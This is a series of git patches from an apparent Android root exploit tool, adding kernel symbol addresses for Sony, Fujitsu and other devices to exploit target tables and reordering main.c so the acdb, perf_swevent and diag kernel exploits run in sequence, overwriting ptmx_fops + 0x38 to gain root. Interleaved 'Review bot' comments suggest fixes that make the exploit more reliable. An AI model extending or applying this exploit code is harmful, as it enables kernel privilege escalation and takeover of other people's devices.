@@ -25,6 +25,7 @@ static supported_device supported_devices[] = { { DEVICE_SONYTABLET_P_RELEASE5A, 0xc06e6da0 }, { DEVICE_SH04E_01_00_02, 0xc0eed190 }, { DEVICE_SH04E_01_00_03, 0xc0eed190 }, + { DEVICE_SGP321_10_1_1_A_1_307, 0xc0d36740 }, { DEVICE_SGP312_10_1_C_0_370, 0xc0d35ca8 }, { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, { DEVICE_SO02E_10_1_D_0_343, 0xc0e38620 }, From 34e8d8792904d407a911bd13828f9ab1cf742ccc Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 22 Jun 2013 03:40:46 +0530 Subject: [PATCH 009/125] added support for Xperia Tablet Z (SGP311) - 10.1.C.0.370 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 7819b2f..af15dfb 100644 --- a/cred.c +++ b/cred.c @@ -28,6 +28,7 @@ static supported_device supported_devices[] = { { DEVICE_SC04E_MF1, 0xc00960d0, 0xc0095bbc }, { DEVICE_SGP321_10_1_1_A_1_307, 0xc0094124, 0xc0093c48 }, { DEVICE_SGP312_10_1_C_0_370, 0xc009363c, 0xc0093160 }, + { DEVICE_SGP311_10_1_C_0_370, 0xc009363c, 0xc0093160 }, { DEVICE_SH04E_01_00_02, 0xc008d86c, 0xc008d398 }, { DEVICE_SH04E_01_00_03, 0xc008d99c, 0xc008d4c8 }, { DEVICE_SO01E_9_1_C_0_473, 0xc009843c, 0xc0097f60 }, diff --git a/device_database b/device_database index a19bf5d..9e38b54 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit a19bf5d0a1132c49fd3ff6716f8cc133366d79cc +Subproject commit 9e38b54ae3adbc765cb6cfa0e497d4c3c4452703 diff --git a/libperf_event_exploit b/libperf_event_exploit index dad23e6..bb520f8 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit dad23e6fd4671cdf1c45107796792811f22d451b +Subproject commit bb520f8eb85f7b2baa0e04b3a811471508dfd7ea diff --git a/mm.c b/mm.c index 3f39a99..f82e0ce 100644 --- a/mm.c +++ b/mm.c 
@@ -14,6 +14,7 @@ static supported_device supported_devices[] = { { DEVICE_SC04E_MF1, 0xc01138a4 }, { DEVICE_SGP321_10_1_1_A_1_307, 0xc0109be4 }, { DEVICE_SGP312_10_1_C_0_370, 0xc01090fc }, + { DEVICE_SGP311_10_1_C_0_370, 0xc01090fc }, { DEVICE_SH04E_01_00_02, 0xc00e458c }, { DEVICE_SH04E_01_00_03, 0xc00e46bc }, { DEVICE_SO01E_9_1_C_0_473, 0xc010e1f4 }, diff --git a/ptmx.c b/ptmx.c index d37cdbc..b0120f8 100644 --- a/ptmx.c +++ b/ptmx.c @@ -27,6 +27,7 @@ static supported_device supported_devices[] = { { DEVICE_SH04E_01_00_03, 0xc0eed190 }, { DEVICE_SGP321_10_1_1_A_1_307, 0xc0d36740 }, { DEVICE_SGP312_10_1_C_0_370, 0xc0d35ca8 }, + { DEVICE_SGP311_10_1_C_0_370, 0xc0d35ca8 }, { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, { DEVICE_SO02E_10_1_D_0_343, 0xc0e38620 }, { DEVICE_SO03E_10_1_E_0_265, 0xc0d36aa8 }, From 4f8abf8cd72672b418a677065da39b910f53e520 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 22 Jun 2013 03:50:58 +0530 Subject: [PATCH 010/125] no need to worry about customizations, seems that for a particular firmware all customizations have the same zImage --- cred.c | 12 ++++++------ device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 12 ++++++------ ptmx.c | 12 ++++++------ 5 files changed, 20 insertions(+), 20 deletions(-) diff --git a/cred.c b/cred.c index af15dfb..5f835cf 100644 --- a/cred.c +++ b/cred.c 
@@ -43,12 +43,12 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c }, { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, - { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, + { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, + { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, + { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C5302_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index 9e38b54..eaa3e7e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 9e38b54ae3adbc765cb6cfa0e497d4c3c4452703 +Subproject commit eaa3e7e370fc3341ac01c436c4de08a40408a77c diff --git a/libperf_event_exploit b/libperf_event_exploit index bb520f8..83f94f6 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit bb520f8eb85f7b2baa0e04b3a811471508dfd7ea +Subproject commit 83f94f6ae82f3a4e9d6fc3efcd53dc3db1d33e55 diff --git a/mm.c b/mm.c index f82e0ce..027ea6f 100644 --- a/mm.c +++ b/mm.c 
@@ -29,12 +29,12 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, { DEVICE_LG_E975_V10e, 0xc0116598 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, - { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0109894 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, - { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc0112668 }, + { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, + { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, + { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, + { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, + { DEVICE_C5302_12_0_A_1_284, 0xc011445c }, + { DEVICE_C6503_10_3_A_0_423, 0xc0112668 }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index b0120f8..d30edc2 100644 --- a/ptmx.c +++ b/ptmx.c @@ -41,12 +41,12 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, { DEVICE_LG_E975_V10e, 0xc0f9da70 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, - { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0d37488 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, - { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc0e46ce0 }, + { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, + { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, + { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, + { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, + { DEVICE_C5302_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From bdb0a3b18191d5ac5e626d4012bea0a7563d2cc0 Mon Sep 17 00:00:00 2001 
From: DooMLoRD Date: Sat, 22 Jun 2013 03:59:13 +0530 Subject: [PATCH 011/125] add compatibility with device variants, seems that for a particular firmware all closely related device variants have the same zImage --- cred.c | 6 ++++++ device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 6 ++++++ ptmx.c | 6 ++++++ 5 files changed, 20 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 5f835cf..fcb39f1 100644 --- a/cred.c +++ b/cred.c @@ -46,9 +46,15 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C6602_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C5302_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C5303_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C5306_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, + { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, + { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index eaa3e7e..db39291 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit eaa3e7e370fc3341ac01c436c4de08a40408a77c +Subproject commit db3929157e25c1c19133b3b17535409e6751e6b8 diff --git a/libperf_event_exploit b/libperf_event_exploit index 83f94f6..db48be8 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 83f94f6ae82f3a4e9d6fc3efcd53dc3db1d33e55 +Subproject commit db48be85baf8d03ef1421b03eaaea924c5463d7b diff --git a/mm.c b/mm.c index 027ea6f..3119936 100644 --- a/mm.c +++ b/mm.c 
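Review bot: The six added cred.c rows duplicate the address pair of the row directly above each of them (`DEVICE_C6602_*` copies `DEVICE_C6603_*`, `DEVICE_C5303`/`DEVICE_C5306` copy `DEVICE_C5302`, `DEVICE_C6502`/`DEVICE_C6506` copy `DEVICE_C6503`), and the only statement of why that is valid is in the commit message. A comment above each group, such as `// closely related device variants share one zImage per firmware build (see C6602/C6603)`, would put that reasoning next to the data so the next person neither re-derives nor "fixes" the values; the mm.c and ptmx.c hunks of this commit need the same note. Rows that are equal by construction are also a candidate for a single entry keyed by the shared kernel rather than one per variant, but that is a larger change than this commit.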
@@ -32,9 +32,15 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, + { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, + { DEVICE_C6602_10_1_1_A_1_253, 0xc0109894 }, { DEVICE_C5302_12_0_A_1_284, 0xc011445c }, + { DEVICE_C5303_12_0_A_1_284, 0xc011445c }, + { DEVICE_C5306_12_0_A_1_284, 0xc011445c }, { DEVICE_C6503_10_3_A_0_423, 0xc0112668 }, + { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, + { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index d30edc2..58b5e2e 100644 --- a/ptmx.c +++ b/ptmx.c @@ -44,9 +44,15 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, + { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, + { DEVICE_C6602_10_1_1_A_1_253, 0xc0d37488 }, { DEVICE_C5302_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C5303_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C5306_12_0_A_1_284, 0xc0e3bed8 }, { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 }, + { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, + { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 1f00745d9dda8edf44b2d7f4f908f96a2754eb31 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 22 Jun 2013 04:02:29 +0530 Subject: [PATCH 012/125] added support for Xperia T (LT30p) 9.1.A.1.141 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index fcb39f1..7372a04 100644 --- a/cred.c +++ b/cred.c 
@@ -55,6 +55,7 @@ static supported_device supported_devices[] = {
 { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 },
 { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 },
 { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 },
+ { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c},
 { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc },
 };
diff --git a/device_database b/device_database
index db39291..bd03738 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit db3929157e25c1c19133b3b17535409e6751e6b8
+Subproject commit bd037381cd521d10c7b1bb07b2cd4ff4e26ca4a1
diff --git a/libperf_event_exploit b/libperf_event_exploit
index db48be8..0fa2096 160000
--- a/libperf_event_exploit
+++ b/libperf_event_exploit
@@ -1 +1 @@
-Subproject commit db48be85baf8d03ef1421b03eaaea924c5463d7b
+Subproject commit 0fa209600ccd23a8473c09f0e5eda4a1dc67e7b4
diff --git a/mm.c b/mm.c
index 3119936..8557fb0 100644
--- a/mm.c
+++ b/mm.c
@@ -41,6 +41,7 @@ static supported_device supported_devices[] = {
 { DEVICE_C6503_10_3_A_0_423, 0xc0112668 },
 { DEVICE_C6502_10_3_A_0_423, 0xc0112668 },
 { DEVICE_C6506_10_3_A_0_423, 0xc0112668 },
+ { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 },
 { DEVICE_N05E_A1000311, 0xc0105800 },
 };
diff --git a/ptmx.c b/ptmx.c
index 58b5e2e..beab5d7 100644
--- a/ptmx.c
+++ b/ptmx.c
@@ -53,6 +53,7 @@ static supported_device supported_devices[] = {
 { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 },
 { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 },
 { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 },
+ { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00},
 { DEVICE_N05E_A1000311, 0xc0f58700 },
 };
From e04669d3bebf567fa809e4574fd20dc5f94b5961 Mon Sep 17 00:00:00 2001
From: sj8023ld
Date: Sun, 23 Jun 2013 08:36:34 +0800
Subject: [PATCH 013/125] add LT29i 9.1.B.1.67
---
 cred.c | 1 +
 mm.c | 1 +
 ptmx.c | 1 +
 3 files changed, 3 insertions(+)
diff --git a/cred.c b/cred.c
index 7372a04..5c2e59a 100644
--- a/cred.c
+++ b/cred.c
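Review bot: The cred.c row `{ DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c},` and the ptmx.c row `{ DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00},` drop the space before the closing brace that every other row in the three tables has; the mm.c row in this same commit, `{ DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 },`, is formatted like the rest. A trivial nit on its own, but these tables are reviewed by eye, and uniform spacing is what makes a column-wise scan of the addresses work.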
@@ -56,6 +56,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c}, + { DEVICE_LT29i_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/mm.c b/mm.c index 8557fb0..da3a4df 100644 --- a/mm.c +++ b/mm.c @@ -42,6 +42,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 }, + { DEVICE_LT29i_9_1_B_1_67, 0xc010aaec }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index beab5d7..038a8d0 100644 --- a/ptmx.c +++ b/ptmx.c @@ -54,6 +54,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00}, + { DEVICE_LT29i_9_1_B_1_67, 0xc0d01f60 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 59e101890662426a322d8fd869ada31e65276e56 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sun, 23 Jun 2013 14:30:04 +0900 Subject: [PATCH 014/125] attempt diag_exploit last because it is not stable. Try stable one first. --- main.c | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/main.c b/main.c index b4ff50e..440ec94 100644 --- a/main.c +++ b/main.c 
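Review bot: The new identifier `DEVICE_LT29i_9_1_B_1_67` spells the model code with a lowercase `i`, while every other row in the table is fully upper-case (`DEVICE_LT26I_6_2_B_0_211`, `DEVICE_LT30P_9_1_A_1_141`); it should be `DEVICE_LT29I_9_1_B_1_67` here and in the matching mm.c and ptmx.c rows of this patch. The name has to agree with whatever device_database defines, and this patch does not bump that submodule, so the build will only link if the lowercase spelling exists there — worth checking.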
@@ -74,20 +74,20 @@ run_exploit(void)
 ptmx_fsync_address = ptmx_fops_address + 0x38;
- if (attempt_diag_exploit(ptmx_fsync_address)) {
+ printf("Attempt acdb exploit...\n");
+ if (attempt_acdb_exploit(ptmx_fsync_address, 0)) {
 return true;
 }
 printf("\n");
- printf("Attempt acdb exploit...\n");
- if (attempt_acdb_exploit(ptmx_fsync_address, 0)) {
+ printf("Attempt perf_swevent exploit...\n");
+ if (perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege,
+ run_obtain_root_privilege, NULL)) {
 return true;
 }
 printf("\n");
- printf("Attempt perf_swevent exploit...\n");
- return perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege,
- run_obtain_root_privilege, NULL);
+ return attempt_diag_exploit(ptmx_fsync_address);
 }
 int
From 459f673bba9de0bb7f190b91b9c7e11a3decc58b Mon Sep 17 00:00:00 2001
From: fi01
Date: Sun, 23 Jun 2013 14:33:52 +0900
Subject: [PATCH 015/125] Add FJL21 V23R39X
---
 device_database | 2 +-
 libperf_event_exploit | 2 +-
 ptmx.c | 1 +
 3 files changed, 3 insertions(+), 2 deletions(-)
diff --git a/device_database b/device_database
index bd03738..724b7ec 160000
--- a/device_database
+++ b/device_database
@@ -1 +1 @@
-Subproject commit bd037381cd521d10c7b1bb07b2cd4ff4e26ca4a1
+Subproject commit 724b7ec5f363b6071d0f99cab3649240b7a13978
diff --git a/libperf_event_exploit b/libperf_event_exploit
index 0fa2096..61d0b16 160000
--- a/libperf_event_exploit
+++ b/libperf_event_exploit
@@ -1 +1 @@
-Subproject commit 0fa209600ccd23a8473c09f0e5eda4a1dc67e7b4
+Subproject commit 61d0b16670c02dd7cd06869e564ce1827ef17533
diff --git a/ptmx.c b/ptmx.c
index 038a8d0..b900746 100644
--- a/ptmx.c
+++ b/ptmx.c
@@ -11,6 +11,7 @@ static supported_device supported_devices[] = {
 { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 },
 { DEVICE_F11D_V24R40A, 0xc1056998 },
+ { DEVICE_FJL21_V23R39X, 0xc0ee31f8 },
 { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 },
 { DEVICE_SCL21_LJD, 0xc0c71dc0 },
 { DEVICE_SC01E_LJ3, 0xc10a5a48 },
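Review bot: The diag attempt that now closes run_exploit has no banner, unlike the acdb and perf_swevent attempts that precede it, so a device that falls through to the unstable path prints only the blank line from `printf("\n")` before whatever attempt_diag_exploit emits; add `printf("Attempt diag exploit...\n");` in front of the final `return attempt_diag_exploit(ptmx_fsync_address);`. The reason for the new order exists only in the commit message; a comment such as `/* diag exploit is unstable: try it only after acdb and perf_swevent have failed */` above the first attempt keeps that rationale with the code. run_exploit begins before this hunk, so the earlier lookups that produce ptmx_fops_address are not visible here.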
From 8adc5fe04673337b997be85ac6c7e0f22047fdeb Mon Sep 17 00:00:00 2001 From: fi01 Date: Sun, 23 Jun 2013 16:32:28 +0900 Subject: [PATCH 016/125] Add FJL21 V37R47A --- device_database | 2 +- libperf_event_exploit | 2 +- ptmx.c | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 724b7ec..e8b02d0 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 724b7ec5f363b6071d0f99cab3649240b7a13978 +Subproject commit e8b02d0b57f162b47341c072e704091225641964 diff --git a/libperf_event_exploit b/libperf_event_exploit index 61d0b16..c1f8fcd 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 61d0b16670c02dd7cd06869e564ce1827ef17533 +Subproject commit c1f8fcd7fcccbdb962339bf54c6784d88aa6d0b2 diff --git a/ptmx.c b/ptmx.c index b900746..087d6a0 100644 --- a/ptmx.c +++ b/ptmx.c @@ -12,6 +12,7 @@ static supported_device supported_devices[] = { { DEVICE_F11D_V24R40A, 0xc1056998 }, { DEVICE_FJL21_V23R39X, 0xc0ee31f8 }, + { DEVICE_FJL21_V37R47A, 0xc0ee3378 }, { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, { DEVICE_SCL21_LJD, 0xc0c71dc0 }, { DEVICE_SC01E_LJ3, 0xc10a5a48 }, From d22ca259acef4b8ec6c35e8e3bedd3e965e77524 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sun, 23 Jun 2013 16:43:40 +0900 Subject: [PATCH 017/125] Added LT29i 9.1.B.0.411 --- cred.c | 5 +++-- device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 3 ++- ptmx.c | 3 ++- 5 files changed, 9 insertions(+), 6 deletions(-) diff --git a/cred.c b/cred.c index 5c2e59a..32a7285 100644 --- a/cred.c +++ b/cred.c 
@@ -55,8 +55,9 @@ static supported_device supported_devices[] = { { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, - { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c}, - { DEVICE_LT29i_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, + { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c }, + { DEVICE_LT29I_9_1_B_0_411, 0xc0095dec, 0xc0095910 }, + { DEVICE_LT29I_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index e8b02d0..a0be2cd 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit e8b02d0b57f162b47341c072e704091225641964 +Subproject commit a0be2cdc12a1228099691b6a0583670976805492 diff --git a/libperf_event_exploit b/libperf_event_exploit index c1f8fcd..0e20dc1 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit c1f8fcd7fcccbdb962339bf54c6784d88aa6d0b2 +Subproject commit 0e20dc15c385b29a635c3a87d0d7f44cfa954ffb diff --git a/mm.c b/mm.c index da3a4df..900c5d8 100644 --- a/mm.c +++ b/mm.c @@ -42,7 +42,8 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 }, - { DEVICE_LT29i_9_1_B_1_67, 0xc010aaec }, + { DEVICE_LT29I_9_1_B_0_411, 0xc010ac30 }, + { DEVICE_LT29I_9_1_B_1_67, 0xc010aaec }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index 087d6a0..c134b33 100644 --- a/ptmx.c +++ b/ptmx.c @@ -56,7 +56,8 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00}, - { DEVICE_LT29i_9_1_B_1_67, 0xc0d01f60 }, + { DEVICE_LT29I_9_1_B_0_411, 0xc0d01f60 }, + { DEVICE_LT29I_9_1_B_1_67, 0xc0d01f60 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; 
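Review bot: `DEVICE_LT29I_9_1_B_0_411` is given exactly the same ptmx_fops address as `DEVICE_LT29I_9_1_B_1_67` (0xc0d01f60), while the cred.c and mm.c hunks of this same patch give the two builds different addresses (0xc0095dec vs 0xc0095ca4, 0xc010ac30 vs 0xc010aaec). Different text addresses usually mean a different kernel image, so an identical data address for ptmx_fops is possible but looks more like a value copied from the .67 row; please confirm it against the .411 kernel before relying on it, since the exploits write to `ptmx_fops_address + 0x38` and a wrong pointer corrupts an arbitrary kernel location.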
From 29dd41ca62ecc3ed3051b7de3b650b33b5f77781 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 03:52:45 +0530 Subject: [PATCH 018/125] added support for Xperia SL (LT26ii) 6.2.B.0.211 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 32a7285..a640e60 100644 --- a/cred.c +++ b/cred.c @@ -45,6 +45,7 @@ static supported_device supported_devices[] = { { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, + { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, diff --git a/device_database b/device_database index a0be2cd..8f02c42 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit a0be2cdc12a1228099691b6a0583670976805492 +Subproject commit 8f02c42541e29787277e879b33b937662e617b72 diff --git a/libperf_event_exploit b/libperf_event_exploit index 0e20dc1..ca9e38a 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 0e20dc15c385b29a635c3a87d0d7f44cfa954ffb +Subproject commit ca9e38aededa7bfd41a6b28671330117607d0a88 diff --git a/mm.c b/mm.c index 900c5d8..b695c0c 100644 --- a/mm.c +++ b/mm.c @@ -31,6 +31,7 @@ static supported_device supported_devices[] = { { DEVICE_LG_E975_V10e, 0xc0116598 }, { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, + { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index c134b33..9745a9c 100644 --- a/ptmx.c +++ b/ptmx.c 
